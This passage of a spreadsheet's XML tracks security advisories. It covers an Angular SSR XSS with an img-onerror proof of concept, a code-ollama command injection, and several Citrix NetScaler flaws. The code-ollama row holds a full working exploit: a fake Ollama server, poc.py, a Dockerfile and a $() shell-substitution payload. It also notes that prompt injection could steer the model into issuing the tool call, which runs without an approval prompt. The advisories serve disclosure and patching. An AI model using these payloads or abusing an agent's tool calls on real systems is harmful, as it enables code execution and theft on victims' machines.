### Workarounds
If upgrading is not immediately possible, reject any URL whose host contains a `[` or `]` that is not a well-formed IPv6 literal before making a host decision. Clients that fail closed on credential-bearing URLs, such as Node's global `fetch()`, are not affected by the reported vector.</t>
        </is>
      </c>
      <c r="T148" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84394</t>
        </is>
      </c>
    </row>
    <row r="149">
      <c r="A149" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B149" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C149" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88058</t>
        </is>
      </c>
      <c r="D149" s="5" t="inlineStr"/>
      <c r="E149" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F149" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G149" s="5" t="inlineStr"/>
      <c r="H149" s="5" t="inlineStr"/>
      <c r="I149" s="5" t="inlineStr"/>
      <c r="J149" s="5" t="inlineStr">
        <is>
          <t>npm, angular</t>
        </is>
      </c>
      <c r="K149" s="5" t="inlineStr"/>
      <c r="L149" s="5" t="inlineStr">
        <is>
          <t>npm:@angular/platform-server</t>
        </is>
      </c>
      <c r="M149" s="5" t="inlineStr">
        <is>
          <t>20.3.30, 21.2.22, 22.1.4</t>
        </is>
      </c>
      <c r="N149" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O149" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P149" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q149" s="5" t="inlineStr"/>
      <c r="R149" s="5" t="inlineStr"/>
      <c r="S149" s="5" t="inlineStr">
        <is>
          <t>### Summary
An XSS vulnerability exists in `@angular/platform-server` during server-side rendering (SSR) HTML serialization of `ProcessingInstruction` DOM nodes (`&lt;?target data?&gt;`, `nodeType === 7`) when nested inside fallback raw-content elements (`&lt;noscript&gt;`, `&lt;iframe&gt;`, `&lt;noembed&gt;`, `&lt;noframes&gt;`). While processing instruction data escaped `&gt;` to `&amp;gt;`, it did not check for or escape matching closing tags of ancestor fallback elements (e.g., `&lt;/noscript&gt;`). When rendered in a browser with scripting enabled, an unescaped closing tag sequence in a processing instruction prematurely closes the fallback raw-content tag and causes subsequent sibling elements to execute as live HTML.
### Technical Description
In HTML5 parsing, fallback raw-content elements (`&lt;noscript&gt;`, `&lt;iframe&gt;`, `&lt;noembed&gt;`, `&lt;noframes&gt;`) place the browser's HTML tokenizer into `RAWTEXT` mode. In `RAWTEXT` mode, processing instruction tokens (`&lt;?...?&gt;`) are treated as literal raw text rather than bogus comments, and the parser ignores `&gt;` or `?&gt;`. The only token sequence that terminates the container is an end tag matching the container tag name (`&lt;/noscript`, `&lt;/iframe`, etc.).
During server-side HTML serialization, processing instruction nodes previously only replaced `&gt;` with `&amp;gt;` (preventing bogus comment breakouts in normal HTML data states) but left `&lt;` untouched. Crucially, processing instruction serialization never inspected ancestor fallback raw-content tags. As a result, if a `ProcessingInstruction` node inside `&lt;noscript&gt;` contained `&lt;/noscript ` in its data payload, it was emitted unescaped as `&lt;?x &lt;/noscript ?&gt;`.
### Impact &amp; Reachability
* **Reachability**: Processing instruction nodes cannot be authored directly through standard Angular template syntax (which parses `&lt;?...&gt;` into comment nodes in DOM position). Reaching this vulnerability requires application or library code calling `inject(DOCUMENT).createProcessingInstruction(target, data)` or `Renderer2` DOM insertion methods with untrusted user input passed to `data` inside a fallback raw-content container.
* **Impact**: In applications that programmatically construct processing instruction nodes inside fallback elements during server-side rendering, an attacker controlling the processing instruction data can break out of the container and execute arbitrary JavaScript in victims' browsers.
### Proof of Concept (Minimal Reproduction)
```ts
import { Component, ElementRef, Renderer2, inject, DOCUMENT, AfterViewInit } from '@angular/core';
@Component({
  selector: 'app-root',
  standalone: true,
  template: `&lt;noscript id="host"&gt;&lt;/noscript&gt;`
})
export class AppComponent implements AfterViewInit {
  private r = inject(Renderer2);
  private el = inject(ElementRef);
  private doc = inject(DOCUMENT);
  ngAfterViewInit() {
    const host = this.el.nativeElement.querySelector('#host');
    // Attacker-controlled input passed as Processing Instruction data
    const pi = this.doc.createProcessingInstruction('x', '&lt;/noscript ');
    this.r.appendChild(host, pi);
    // Sibling markup that should remain inert inside &lt;noscript&gt;
    const img = this.r.createElement('img');
    this.r.setAttribute(img, 'src', 'x');
    this.r.setAttribute(img, 'onerror', 'alert("SSR_PI_XSS")');
    this.r.appendChild(host, img);
  }
}
```
**Vulnerable SSR Output**:
```html
&lt;noscript&gt;&lt;?x &lt;/noscript ?&gt;&lt;img src="x" onerror="alert('SSR_PI_XSS')"&gt;&lt;/noscript&gt;
```
### Workarounds
* Avoid passing untrusted user input into `document.createProcessingInstruction(target, data)` when the node is inserted into `&lt;noscript&gt;`, `&lt;iframe&gt;`, `&lt;noembed&gt;`, or `&lt;noframes&gt;` during server-side rendering.
* Manually sanitize or replace `&lt;` with `&amp;lt;` in any untrusted data passed to processing instruction nodes on the server.</t>
        </is>
      </c>
      <c r="T149" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88058</t>
        </is>
      </c>
    </row>
    <row r="150">
      <c r="A150" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B150" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C150" s="5" t="inlineStr">
        <is>
          <t>GHSA-456v-xq2p-r4cj</t>
        </is>
      </c>
      <c r="D150" s="5" t="inlineStr"/>
      <c r="E150" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F150" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G150" s="5" t="inlineStr"/>
      <c r="H150" s="5" t="inlineStr"/>
      <c r="I150" s="5" t="inlineStr"/>
      <c r="J150" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K150" s="5" t="inlineStr"/>
      <c r="L150" s="5" t="inlineStr">
        <is>
          <t>npm:code-ollama</t>
        </is>
      </c>
      <c r="M150" s="5" t="inlineStr">
        <is>
          <t>0.36.1</t>
        </is>
      </c>
      <c r="N150" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O150" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P150" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q150" s="5" t="inlineStr"/>
      <c r="R150" s="5" t="inlineStr"/>
      <c r="S150" s="5" t="inlineStr">
        <is>
          <t>## `grep_search` Command Injection via Unescaped `$()` Shell Substitution (CWE-78)
### Summary
The `grep_search` tool in `code-ollama` constructs a shell command string by interpolating attacker-controlled `pattern` and `path` arguments, then executes it via `child_process.exec()`. The sanitization only escapes backslashes and double-quote characters, leaving `$()` command substitution and backtick expansion fully intact. A malicious or compromised Ollama server can therefore inject and execute arbitrary OS commands with the privileges of the local user running `code-ollama`. Because `grep_search` is classified as a read-only tool, it auto-executes in Plan mode without any user approval prompt, making this a no-interaction-required exploitation path. Severity is **High (CVSS 7.8)**.
### Details
**Vulnerable sink — `src/utils/tools/filesystem/grep.ts:58-66`**
```ts
const escapedPattern = searchPattern
  .replace(/\\/g, '\\\\')
  .replace(/"/g, '\\"');
const escapedDirPath = dirPath.replace(/\\/g, '\\\\').replace(/"/g, '\\"');
const { stdout } = await execShell(
  `rg --line-number --no-heading --smart-case "${escapedPattern}" "${escapedDirPath}"`,
);
```
Only `\` and `"` are neutralized. The shell metacharacter sequence `$()` (and backtick-style `` ` `` substitution) is passed through unmodified. The resulting string is passed to `execShell()` (`src/utils/tools/shell.ts:46-49`), which calls `exec` — the promisified `child_process.exec` defined at `src/utils/node.ts:1-4` — causing `/bin/sh` to interpret the entire string and expand any embedded command substitution.
**Full data-flow path (source → sink)**
| Step | Location | Action |
|------|----------|--------|
| 1 | `src/utils/ollama.ts:102-103` | External Ollama chat stream delivers `chunk.message.tool_calls` to the CLI |
| 2 | `src/cli.ts:147-148` | Each `toolCall` is forwarded to `tools.executeToolCall()` |
| 3 | `src/utils/tools/dispatcher.ts:300-306` | Dispatcher normalizes the call and routes it |
| 4 | `src/utils/tools/dispatcher.ts:392-393` | `stringArgs.pattern` and `stringArgs.path` are passed verbatim to `grepSearch()` |
| 5 | `src/utils/tools/filesystem/grep.ts:58-63` | Incomplete sanitization: only `\` and `"` are escaped (**root cause**) |
| 6 | `src/utils/tools/filesystem/grep.ts:65` | Shell command string assembled and handed to `execShell()` (**sink**) |
| 7 | `src/utils/tools/shell.ts:46-49` → `src/utils/node.ts:1-4` | `exec()` (`child_process.exec`) executes the string via `/bin/sh` |
**Approval-bypass amplifier**
`grep_search` is listed in `READ_TOOL_NAMES` at `src/constants/tool.ts:14-20` and is exposed in Plan mode at `src/utils/tools/definitions.ts:225-228`. Read-only tools execute automatically without presenting an approval prompt to the user, so exploitation requires zero user interaction beyond the initial `code-ollama run` invocation.
### PoC
**Prerequisites**
- `code-ollama` v0.36.0 installed (e.g., `npm install --global code-ollama@0.36.0` or built from source via the Dockerfile below).
- `ripgrep` (`rg`) available in `PATH` (the vulnerable code path requires it).
- Python 3 available to run the fake Ollama server.
**Step 1 — Build the self-contained Docker image (recommended)**
```sh
# From the report root directory (where vuln-001/ lives)
docker build -t vuln001-code-ollama -f vuln-001/Dockerfile .
docker run --rm vuln001-code-ollama
```
The container automatically runs `poc.py` as `CMD`. Successful exploitation prints:
```
[+] EXPLOITATION CONFIRMED
[+] Marker file : /tmp/poc-evidence
[+] Contents    : 'uid=0(root) gid=0(root) groups=0(root)'
```
**Step 2 — Manual reproduction (bare-metal)**
```sh
# Terminal 1 — start the malicious Ollama server
cat &gt; /tmp/fake-ollama.py &lt;&lt;'PY'
from http.server import BaseHTTPRequestHandler, HTTPServer
import json, sys, threading
_req = 0
_lock = threading.Lock()
class H(BaseHTTPRequestHandler):
    def log_message(self, *a): pass
    def do_GET(self):
        self.send_response(200); self.end_headers()
        self.wfile.write(b"Ollama is running")
    def do_POST(self):
        global _req
        l = int(self.headers.get("Content-Length", 0))
        self.rfile.read(l)
        with _lock:
            _req += 1; n = _req
        self.send_response(200)
        self.send_header("Content-Type", "application/x-ndjson")
        self.end_headers()
        if n == 1:
            chunk = {"model":"fake","message":{"role":"assistant","content":"",
                "tool_calls":[{"function":{"name":"grep_search",
                    "arguments":{"pattern":"$(id&gt;/tmp/poc-evidence)","path":"/tmp"}}}]},
                "done":True,"done_reason":"stop"}
        else:
            chunk = {"model":"fake","message":{"role":"assistant","content":"Done."},
                "done":True,"done_reason":"stop"}
        self.wfile.write((json.dumps(chunk)+"\n").encode())
        self.wfile.flush()
HTTPServer(("127.0.0.1", 11434), H).serve_forever()
PY
python3 /tmp/fake-ollama.py &amp;
# Terminal 2 — run code-ollama against the fake server
rm -f /tmp/poc-evidence
OLLAMA_HOST=http://127.0.0.1:11434 code-ollama run --trust fake "search the code"
cat /tmp/poc-evidence   # expected: uid=... gid=... groups=...
```
**Explanation of the payload**
The `pattern` argument value `$(id&gt;/tmp/poc-evidence)` survives the sanitization in `grep.ts:58-63` because only `\` and `"` are stripped. When the resulting shell string
```
rg --line-number --no-heading --smart-case "$(id&gt;/tmp/poc-evidence)" "/tmp"
```
is executed by `/bin/sh` via `child_process.exec`, the shell expands `$()` first, running `id` and writing its output to `/tmp/poc-evidence` before `rg` ever starts.
**Remediation**
Replace the shell-string construction with an argument-vector call to avoid the shell entirely:
```diff
-import { execShell } from '../shell';
+import { execFile } from '../../node';
+
+const RG_EXEC_OPTIONS = { timeout: 30_000, maxBuffer: 1024 * 1024 };
-      const escapedPattern = searchPattern
-        .replace(/\\/g, '\\\\')
-        .replace(/"/g, '\\"');
-      const escapedDirPath = dirPath
-        .replace(/\\/g, '\\\\')
-        .replace(/"/g, '\\"');
-
-      const { stdout } = await execShell(
-        `rg --line-number --no-heading --smart-case "${escapedPattern}" "${escapedDirPath}"`,
-      );
+      const { stdout } = await execFile(
+        'rg',
+        ['--line-number', '--no-heading', '--smart-case', '--', searchPattern, dirPath],
+        RG_EXEC_OPTIONS,
+      );
```
### Impact
This is an **OS Command Injection** vulnerability (CWE-78). Any party that controls the Ollama server response — including a rogue model backend, a prompt-injection payload that manipulates the model into issuing a crafted `grep_search` tool call, or a network adversary performing a man-in-the-middle attack on an unencrypted `OLLAMA_HOST` connection — can execute arbitrary commands as the OS user running `code-ollama`.
Impact scope:
- **Confidentiality (High)** — attacker can read any file accessible to the user, exfiltrate source code, secrets, SSH keys, etc.
- **Integrity (High)** — attacker can modify or delete files, plant backdoors, alter repository history.
- **Availability (High)** — attacker can terminate processes, corrupt data, or consume system resources.
The approval-bypass via `READ_TOOL_NAMES` / Plan-mode auto-execution means the attack completes silently with no user interaction after `code-ollama run` is invoked. Developers, CI pipelines, and IDE-integrated users who run `code-ollama` in trusted directories are all at risk.
### Reproduction artifacts
#### `Dockerfile`
```dockerfile
# VULN-001: grep_search Command Injection — CWE-78
# Target: ai-action/code-ollama v0.36.0
# Proof-of-concept Docker image: builds the repo and runs poc.py
#
# Build (from project root):
#   docker build -t vuln001-code-ollama -f vuln-001/Dockerfile .
# Run:
#   docker run --rm vuln001-code-ollama
FROM node:24-slim
# ripgrep  — required by grepSearch() in the vulnerable code path
# python3  — runs poc.py orchestration script
RUN apt-get update &amp;&amp; apt-get install -y \
    ripgrep \
    python3 \
    --no-install-recommends \
 &amp;&amp; rm -rf /var/lib/apt/lists/*
# ── Install Node dependencies ──────────────────────────────────────────────────
WORKDIR /app
COPY repo/package.json repo/package-lock.json ./
# Install ALL deps (devDeps needed for vite build / tsx fallback)
RUN npm ci
# ── Copy source and build ──────────────────────────────────────────────────────
COPY repo/ ./
# Produces /app/dist/cli.js — the bundled CLI entrypoint
RUN npm run build
# ── Runtime setup ─────────────────────────────────────────────────────────────
# code-ollama writes config to ~/.code-ollama; pre-create to avoid mkdir race
RUN mkdir -p /root/.code-ollama /workspace
COPY vuln-001/poc.py /poc.py
WORKDIR /workspace
CMD ["python3", "/poc.py"]
```
#### `poc.py`
```python
#!/usr/bin/env python3
"""
Proof of Concept: VULN-001 — grep_search Command Injection (CWE-78)
Repository : ai-action/code-ollama v0.36.0
Sink       : src/utils/tools/filesystem/grep.ts:65
             execShell(`rg ... "${escapedPattern}" "${escapedDirPath}"`)
Attack path: malicious Ollama server -&gt; tool_call.arguments.pattern
             -&gt; grepSearch() -&gt; execShell() -&gt; child_process.exec()
Only `\\` and `"` are escaped; `$()` command substitution is NOT neutralized.
This PoC demonstrates that a rogue Ollama server can inject arbitrary shell
commands that execute as the local user running code-ollama.
Usage (inside Docker, called automatically by CMD):
    python3 /poc.py
Expected outcome:
    /tmp/poc-evidence is created with content matching INJECTED_CMD output.
"""
import json
import os
import subprocess
import sys
import threading
import time
from http.server import BaseHTTPRequestHandler, HTTPServer
# ---------------------------------------------------------------------------
# Configuration
# ---------------------------------------------------------------------------
FAKE_SERVER_HOST = "127.0.0.1"
FAKE_SERVER_PORT = 11434
# The marker file written by the injected command — used as exploitation proof
MARKER_FILE = "/tmp/poc-evidence"
# Payload: $() command substitution that is NOT escaped by code-ollama's
# sanitization (only \\ and " are escaped, leaving $() intact).
# Writes output of `id` to MARKER_FILE to capture the running UID/GID.
INJECTED_CMD = f"$(id&gt;{MARKER_FILE})"
# Path argument for grep_search (must be a valid non-empty string)
TARGET_PATH = "/workspace"
# Tracks how many POST requests the fake server has received
_request_count = 0
_request_lock = threading.Lock()
# ---------------------------------------------------------------------------
# Fake Ollama HTTP server
# ---------------------------------------------------------------------------
class FakeOllamaHandler(BaseHTTPRequestHandler):
    """Minimal Ollama-compatible HTTP server for the PoC.
    First POST /api/chat  -&gt; returns a grep_search tool_call carrying the
                             injected pattern.
    Subsequent POSTs      -&gt; return a plain done response to terminate the
                             code-ollama tool-loop.
    """
    def log_message(self, fmt, *args):  # suppress default request logging
        pass
    # ------------------------------------------------------------------
    # GET — health-check (code-ollama / ollama-npm may call GET /)
    # ------------------------------------------------------------------
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(b"Ollama is running")
    # ------------------------------------------------------------------
    # POST — chat streaming endpoint
    # ------------------------------------------------------------------
    def do_POST(self):
        global _request_count
        # Consume request body to avoid broken-pipe on the client side
        content_length = int(self.headers.get("Content-Length", 0))
        _ = self.rfile.read(content_length)
        with _request_lock:
            _request_count += 1
            current_request = _request_count
        self.send_response(200)
        self.send_header("Content-Type", "application/x-ndjson")
        self.end_headers()
        if current_request == 1:
            # ---------------------------------------------------------------
            # First request: inject malicious grep_search tool call
            # The `arguments` object is passed verbatim through the ollama-npm
            # library and reaches grepSearch(pattern, path) in grep.ts.
            # ---------------------------------------------------------------
            print(f"[fake-ollama] Request #{current_request}: "
                  f"sending malicious grep_search tool_call")
            sys.stdout.flush()
            chunk = {
                "model": "fake",
                "message": {
                    "role": "assistant",
                    "content": "",
                    "tool_calls": [{
                        "function": {
                            "name": "grep_search",
                            # pattern and path are the two required string args
                            # validated by validateArgs() in dispatcher.ts
                            "arguments": {
                                "pattern": INJECTED_CMD,
                                "path": TARGET_PATH,
                            },
                        }
                    }],
                },
                "done": True,
                "done_reason": "stop",
            }
        else:
            # ---------------------------------------------------------------
            # Subsequent requests: plain text to terminate the tool loop.
            # No tool_calls -&gt; nextMessages stays null -&gt; processRunStream
            # returns after checking hasUncalledToolIntent (no match on
            # "Done.") so the CLI exits cleanly.
            # ---------------------------------------------------------------
            print(f"[fake-ollama] Request #{current_request}: "
                  "sending done/stop response")
            sys.stdout.flush()
            chunk = {
                "model": "fake",
                "message": {
                    "role": "assistant",
                    "content": "Done.",
                },
                "done": True,
                "done_reason": "stop",
            }
        self.wfile.write((json.dumps(chunk) + "\n").encode())
        self.wfile.flush()
def start_fake_server():
    """Start the fake Ollama server in a daemon thread."""
    server = HTTPServer((FAKE_SERVER_HOST, FAKE_SERVER_PORT), FakeOllamaHandler)
    thread = threading.Thread(target=server.serve_forever, daemon=True)
    thread.start()
    return server
# ---------------------------------------------------------------------------
# Main orchestration
# ---------------------------------------------------------------------------
def main():
    print("=" * 65)
    print("VULN-001: grep_search Command Injection PoC (CWE-78)")
    print("Target : ai-action/code-ollama v0.36.0")
    print("Sink   : src/utils/tools/filesystem/grep.ts:65")
    print("=" * 65)
    print()
    print(f"[*] Payload  : {INJECTED_CMD}")
    print(f"[*] Marker   : {MARKER_FILE}")
    print()
    # Clean up any leftover marker from a previous run
    if os.path.exists(MARKER_FILE):
        os.unlink(MARKER_FILE)
        print(f"[*] Removed stale marker file: {MARKER_FILE}")
    # -----------------------------------------------------------------------
    # 1. Start the fake Ollama server
    # -----------------------------------------------------------------------
    print(f"[*] Starting fake Ollama server on "
          f"{FAKE_SERVER_HOST}:{FAKE_SERVER_PORT} ...")
    start_fake_server()
    time.sleep(0.4)   # give the server socket time to bind
    # -----------------------------------------------------------------------
    # 2. Run code-ollama with OLLAMA_HOST pointing to the fake server
    #    --trust skips the interactive directory-trust prompt (src/cli.ts:214)
    # -----------------------------------------------------------------------
    env = os.environ.copy()
    env["OLLAMA_HOST"] = f"http://{FAKE_SERVER_HOST}:{FAKE_SERVER_PORT}"
    # Use the compiled CLI bundle produced by `npm run build` in the Dockerfile
    cmd = [
        "node", "/app/dist/cli.js",
        "run", "--trust", "fake", "search the code",
    ]
    print(f"[*] Executing: {' '.join(cmd)}")
    print(f"[*] OLLAMA_HOST={env['OLLAMA_HOST']}")
    print()
    try:
        result = subprocess.run(
            cmd,
            env=env,
            stdin=subprocess.DEVNULL,   # no TTY / interactive input needed
            capture_output=True,
            text=True,
            timeout=60,
            cwd="/workspace",
        )
    except subprocess.TimeoutExpired:
        print("[-] code-ollama subprocess timed out after 60 s")
        sys.exit(1)
    print("--- code-ollama stdout ---")
    print(result.stdout[:3000] if result.stdout else "(empty)")
    print("--- code-ollama stderr ---")
    print(result.stderr[:3000] if result.stderr else "(empty)")
    print(f"--- exit code: {result.returncode} ---")
    print()
    # -----------------------------------------------------------------------
    # 3. Verify exploitation: check for the marker file
    # -----------------------------------------------------------------------
    if os.path.exists(MARKER_FILE):
        evidence = open(MARKER_FILE).read().strip()
        print("[+] ============================================================")
        print("[+] EXPLOITATION CONFIRMED")
        print("[+] ============================================================")
        print(f"[+] Marker file : {MARKER_FILE}")
        print(f"[+] Contents    : {evidence!r}")
        print("[+] Explanation : The $() command substitution inside the")
        print("[+]   grep_search pattern was NOT escaped by code-ollama's")
        print("[+]   sanitizer (grep.ts:58-63 only strips \\ and \").")
        print("[+]   execShell() passed the raw string to child_process.exec()")
        print("[+]   which ran it through /bin/sh, executing the injected")
        print("[+]   command as the current user.")
        print("[+] ============================================================")
        sys.exit(0)
    else:
        print("[-] ============================================================")
        print("[-] EXPLOITATION FAILED")
        print(f"[-] Expected marker file NOT found: {MARKER_FILE}")
        print("[-] Possible causes:")
        print("[-]   - ollama-npm parsed tool_call.arguments differently")
        print("[-]   - The pattern was sanitized before reaching execShell()")
        print("[-]   - ripgrep is not installed so the fallback path was taken")
        print("[-]   - The shell used does not support $() substitution")
        print("[-] ============================================================")
        sys.exit(1)
if __name__ == "__main__":
    main()
```</t>
        </is>
      </c>
      <c r="T150" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-456v-xq2p-r4cj</t>
        </is>
      </c>
    </row>
    <row r="151">
      <c r="A151" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B151" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (9.5 → 9.8)</t>
        </is>
      </c>
      <c r="C151" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88771</t>
        </is>
      </c>
      <c r="D151" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E151" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F151" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G151" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H151" s="5" t="inlineStr"/>
      <c r="I151" s="5" t="inlineStr"/>
      <c r="J151" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K151" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler_application_delivery_controller, citrix:netscaler_gateway</t>
        </is>
      </c>
      <c r="L151" s="5" t="inlineStr"/>
      <c r="M151" s="5" t="inlineStr"/>
      <c r="N151" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O151" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P151" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q151" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="R151" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S151" s="5" t="inlineStr">
        <is>
          <t>Improper input validation vulnerability in Citrix NetScaler ADC and Citrix NetScaler Gateway.
This issue affects ADC: before 14.1-73.37, before 13.1-64.23, before 14.1-73.37 FIPS, and before 13.1.37.279 FIPS and NDcPP; Gateway: before 14.1-73.37 and before 13.1-64.23 leading to an unauthenticated attacker to execute arbitrary commands.</t>
        </is>
      </c>
      <c r="T151" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88771</t>
        </is>
      </c>
    </row>
    <row r="152">
      <c r="A152" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B152" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (9.5 → 8.1)</t>
        </is>
      </c>
      <c r="C152" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88772</t>
        </is>
      </c>
      <c r="D152" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E152" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F152" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G152" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H152" s="5" t="inlineStr"/>
      <c r="I152" s="5" t="inlineStr"/>
      <c r="J152" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K152" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler_application_delivery_controller, citrix:netscaler_gateway</t>
        </is>
      </c>
      <c r="L152" s="5" t="inlineStr"/>
      <c r="M152" s="5" t="inlineStr"/>
      <c r="N152" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O152" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P152" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q152" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="R152" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="S152" s="5" t="inlineStr">
        <is>
          <t>Vulnerability in Citrix NetScaler ADC and Citrix NetScaler Gateway.
This issue affects ADC: before 14.1-73.37, before 13.1-64.23, before 14.1-73.37 FIPS, and before 13.1.37.279 FIPS and NDcPP; Gateway: before 14.1-73.37 and before 13.1-64.23 leading to Remote Code Execution or Denial of Service</t>
        </is>
      </c>
      <c r="T152" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88772</t>
        </is>
      </c>
    </row>
    <row r="153">
      <c r="A153" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B153" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (9.3 → 10.0)</t>
        </is>
      </c>
      <c r="C153" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88773</t>
        </is>
      </c>
      <c r="D153" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E153" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F153" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G153" s="5" t="inlineStr"/>
      <c r="H153" s="5" t="inlineStr"/>
      <c r="I153" s="5" t="inlineStr"/>
      <c r="J153" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K153" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler_application_delivery_controller, citrix:netscaler_gateway</t>
        </is>
      </c>
      <c r="L153" s="5" t="inlineStr"/>
      <c r="M153" s="5" t="inlineStr"/>
      <c r="N153" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O153" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P153" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q153" s="5" t="inlineStr"/>
      <c r="R153" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="S153" s="5" t="inlineStr">
        <is>
          <t>Inconsistent interpretation of HTTP requests ('HTTP Request/Response smuggling') vulnerability in Citrix NetScaler ADC and Citrix NetScaler Gateway.
This issue affects ADC: before 14.1-73.37, before 13.1-64.23, before 14.1-73.37 FIPS, and before 13.1-37.279 and NDcPP; Gateway: before 14.1-73.37 FIPS and before 13.1-64.23.</t>
        </is>
      </c>
      <c r="T153" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88773</t>
        </is>
      </c>
    </row>
    <row r="154">
      <c r="A154" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B154" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (8.8 → 9.8)</t>
        </is>
      </c>
      <c r="C154" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88775</t>
        </is>
      </c>
      <c r="D154" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E154" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F154" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G154" s="5" t="inlineStr"/>
      <c r="H154" s="5" t="inlineStr"/>
      <c r="I154" s="5" t="inlineStr"/>
      <c r="J154" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K154" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler_application_delivery_controller, citrix:netscaler_gateway</t>
        </is>
      </c>
      <c r="L154" s="5" t="inlineStr"/>
      <c r="M154" s="5" t="inlineStr"/>
      <c r="N154" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O154" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P154" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q154" s="5" t="inlineStr"/>
      <c r="R154" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="S154" s="5" t="inlineStr">
        <is>
